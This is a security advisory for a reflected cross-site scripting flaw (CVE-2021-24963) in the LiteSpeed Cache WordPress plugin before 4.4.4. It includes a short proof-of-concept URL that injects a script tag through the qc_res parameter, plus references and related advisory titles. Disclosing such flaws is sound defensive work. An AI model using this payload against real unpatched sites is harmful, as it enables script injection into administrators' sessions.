LiteSpeed Cache < 4.4.4 – Admin+ Reflected Cross-Site Scripting | CVE 2021-24963 | Plugin Vulnerabilities

Description

The plugin does not escape the qc_res parameter before outputting it back in the JS code of an admin page, leading to a Reflected Cross-Site Scripting

Proof of Concept

As admin, enter the following payload in the Domain Key setting of the plugin: </script><script>

Then open https://example.com/wp-admin/admin.php?page=litespeed-general&qc_res=</script><script>alert(/XSS/)</script>&domain_hash=541a0e1df04a2a5b7e4bd3472ff596cc

Affects Plugins

litespeed-cache

Fixed in 4.4.4

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2634373

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Emil Kylander

Submitter

Emil Kylander

Submitter website

https://emilkylander.se

Submitter twitter

Verified

Yes

WPVDB ID

7f8b4275-7586-4e04-afd9-d12bdab6ba9b

Timeline

Publicly Published

2021-11-30 (about 2 years ago)

Added

2021-11-30 (about 2 years ago)

Last Updated

2022-04-09 (about 2 years ago)

Other

Published

Title

Published

2022-10-19

Title

Mantenimiento Web < 0.14 - Admin+ Stored XSS

Published

2023-10-18

Title

Responsive Image Gallery, Gallery Album <= 2.0.3 - Unauthenticated Stored XSS

Published

2021-08-09

Title

WP Fusion Lite < 3.37.31 - Reflected Cross-Site Scripting (XSS)

Published

2023-04-17

Title

PowerPress Podcasting < 10.0.2 - Contributor+ Stored XSS

Published

2015-01-12

Title

Page Builder by SiteOrigin 2.0.3 - Reflected XSS